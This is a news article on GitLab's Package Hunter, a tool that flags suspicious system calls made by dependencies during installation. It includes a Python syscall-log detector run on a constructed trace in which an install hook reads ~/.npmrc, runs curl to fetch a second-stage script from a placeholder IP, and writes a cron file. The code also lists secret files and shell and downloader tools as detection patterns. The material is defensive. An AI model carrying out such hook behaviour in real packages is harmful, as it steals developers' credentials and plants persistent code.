GitLab has released Package Hunter, a tool intended to detect malicious code in dependencies (the third-party libraries that developers add to their own code) before it can do any harm. The tool is open source and available for free.
Package Hunter installs the dependencies in a sandbox environment and monitors every system call the dependencies make during installation (the monitoring is built on Falco). If one of those calls looks suspicious, for example an install script that opens a network connection or spawns a shell, the user receives a notification and can take action. Package Hunter currently supports NodeJS modules and Ruby Gems.
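To make the mechanism in the paragraph above concrete, here is an added example that is not Package Hunter's own code: a hand-written, strace-style syscall-log hunter rather than the Falco rules the real tool uses. It reconstructs the process tree from clone() return values so that it can tell the installer itself (which legitimately reads ~/.npmrc and talks to the registry), the `sh -c` the installer uses to run lifecycle hooks, and the hook's own code apart, and it flags only the latter for reading secrets, opening network connections, writing outside the package directory, or spawning shells and downloaders. The trace, the pids, the package name `left-pad-utils` and the path `/app/node_modules` are all constructed for the example; nothing here is a real capture.

```python
import re
from dataclasses import dataclass

# Constructed strace -f style output (made up for this example, not a real
# capture): the installer (pid 1234) runs the lifecycle hook of a hypothetical
# package "left-pad-utils" through `sh -c`, and that hook misbehaves.
SAMPLE_TRACE = """\
1234 openat(AT_FDCWD, "/app/node_modules/left-pad-utils/package.json", O_RDONLY|O_CLOEXEC) = 3
1234 openat(AT_FDCWD, "/home/ci/.npmrc", O_RDONLY|O_CLOEXEC) = 4
1234 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD, child_tidptr=0x7f1c2e1d3a10) = 1240
1240 execve("/bin/sh", ["sh", "-c", "node postinstall.js"], 0x55d0c8a2f3c0 /* 24 vars */) = 0
1240 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD, child_tidptr=0x7f9a0c1e2b50) = 1241
1241 execve("/usr/bin/node", ["node", "postinstall.js"], 0x55e1d9b3e4d0 /* 24 vars */) = 0
1241 openat(AT_FDCWD, "/app/node_modules/left-pad-utils/build.log", O_WRONLY|O_CREAT|O_TRUNC, 0644) = 20
1241 openat(AT_FDCWD, "/home/ci/.npmrc", O_RDONLY|O_CLOEXEC) = 21
1241 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 22
1241 connect(22, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("203.0.113.10")}, 16) = 0
1241 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD, child_tidptr=0x7f9a0c1e2b50) = 1242
1242 execve("/usr/bin/curl", ["curl", "-s", "http://203.0.113.10/stage2.sh"], 0x55e1d9b3e4d0 /* 24 vars */) = 0
1242 openat(AT_FDCWD, "/etc/cron.d/updater", O_WRONLY|O_CREAT|O_TRUNC, 0644) = 5
"""

INSTALLER_PID = 1234                              # assumed pid of the package manager itself
PKG_DIR = "/app/node_modules/left-pad-utils"      # assumed install dir of the dependency under test
SENSITIVE_MARKERS = (".npmrc", "/.ssh/", ".aws/credentials", "/etc/passwd", "/etc/shadow", ".env")
SHELLS_AND_DOWNLOADERS = ("/bin/sh", "/bin/bash", "/usr/bin/curl", "/usr/bin/wget", "/usr/bin/nc")

LINE_RE = re.compile(r'^(?P<pid>\d+)\s+(?P<name>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\w+)')
QUOTED_RE = re.compile(r'"([^"]*)"')
ADDR_RE = re.compile(r'inet_addr\("([^"]+)"\)')


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def parse_trace(text):
    """Turn strace-style lines into (pid, syscall, args, ret) tuples; unparsable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((int(m["pid"]), m["name"], m["args"], m["ret"]))
    return events


def hunt(trace_text, installer_pid=INSTALLER_PID, pkg_dir=PKG_DIR):
    """Run the rules over a trace and return the list of Findings, in trace order."""
    parent = {}  # child pid -> parent pid, learned from clone() return values

    def depth(pid):
        # 0 = the installer, 1 = the `sh -c` it runs hooks through, >= 2 = the hook's own code.
        d = 0
        while pid != installer_pid and pid in parent:
            pid, d = parent[pid], d + 1
        return d if pid == installer_pid else 99  # unknown lineage: treat as untrusted

    findings = []
    for pid, name, args, ret in parse_trace(trace_text):
        if name == "clone" and ret.isdigit():
            parent[int(ret)] = pid
            continue
        d = depth(pid)
        if name == "execve":
            m = QUOTED_RE.search(args)
            path = m.group(1) if m else ""
            if d >= 2 and path in SHELLS_AND_DOWNLOADERS:
                findings.append(Finding(pid, "hook-spawns-shell-or-downloader", path))
        elif name == "openat":
            m = QUOTED_RE.search(args)
            path = m.group(1) if m else ""
            writing = re.search(r"O_WRONLY|O_RDWR|O_CREAT", args) is not None
            if d >= 2 and any(mk in path for mk in SENSITIVE_MARKERS):
                findings.append(Finding(pid, "hook-reads-secret", path))
            elif d >= 1 and writing and not path.startswith(pkg_dir + "/"):
                findings.append(Finding(pid, "write-outside-package-dir", path))
        elif name == "connect" and d >= 1:
            m = ADDR_RE.search(args)
            findings.append(Finding(pid, "hook-opens-network-connection", m.group(1) if m else args))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_TRACE):
        print(f"pid {f.pid}: {f.rule} -> {f.detail}")
```

On the constructed trace this reports four findings, all from the hook's processes (1241 and 1242): the hook reading ~/.npmrc, the hook connecting to 203.0.113.10, the hook spawning curl, and curl's child writing into /etc/cron.d. The installer's own read of ~/.npmrc and the `sh -c` it uses to run the hook are deliberately not flagged, which is the distinction a real monitor has to make to avoid alerting on every install.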
GitLab developed Package Hunter in part to give developers more confidence in using public libraries. Public libraries are an easy way to reuse code and add new functionality, but they also carry the risk of pulling bugs or malicious code into a program through its dependencies.
Research from 2020 shows that open source packages are regularly misused in supply chain attacks. For example, malicious code was inserted into a popular package last year. Early this year, researcher Alex Birsan published how he could use dependencies (a technique he called dependency confusion) to hack companies such as Apple and Microsoft.
GitLab has been testing Package Hunter internally since November last year and has now released the tool as free and open source software. By doing so, GitLab hopes that developers will contribute to the project and report bugs. Package Hunter can be added to any project by means of a GitLab CI template.